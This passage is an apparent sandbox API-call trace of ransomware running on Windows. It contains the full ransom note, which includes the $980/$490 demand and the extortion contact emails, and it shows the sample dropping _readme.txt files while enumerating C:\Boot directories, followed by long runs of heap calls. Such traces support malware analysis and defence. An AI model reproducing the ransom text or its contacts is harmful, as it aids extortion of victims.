hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.482] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0227.482] CreateFileW (lpFileName="C:\\Boot\\es-ES\\_readme.txt" (normalized: "c:\\boot\\es-es\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.483] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0227.483] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.483] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.483] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.483] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.483] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.483] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.483] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0227.483] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0227.483] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.484] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.484] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed800 | out: hHeap=0x630000) returned 1 [0227.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed800 [0227.484] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.484] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.484] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.484] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.484] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.484] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.484] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.484] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.484] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.484] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.484] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.485] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.485] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.485] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.485] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.485] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.485] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.485] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.485] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.485] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.485] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.485] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.485] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.485] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.486] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.486] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.486] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.486] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.486] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.486] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.486] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.486] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.486] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.486] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.486] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.486] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.486] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.486] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.487] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.487] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.487] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.487] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.487] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.487] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.487] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.487] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.487] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.487] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.487] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.487] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.487] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.487] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.487] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.487] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.487] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.487] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.487] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.487] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.487] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.487] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.487] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.487] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.487] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.488] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.488] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.488] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.488] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.488] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.488] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.488] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.488] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.488] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.488] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.488] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.488] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.488] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.488] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.488] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.488] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.488] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.488] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.488] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.488] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.488] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.488] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.488] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.488] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.488] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.489] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.489] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.489] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.489] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.489] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.489] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.489] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.489] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.489] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.489] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.489] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.489] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.489] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.489] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.489] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.489] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.489] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.489] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.489] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.489] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.489] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.489] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.489] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.490] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.490] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.490] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.490] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.490] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.490] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.490] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.490] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.490] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.490] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.490] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.490] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.490] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.491] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.491] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.491] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.491] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.491] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.491] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.491] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.491] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.491] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.491] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.491] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.491] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.491] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.491] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.491] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.491] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.491] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.491] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.491] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.491] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 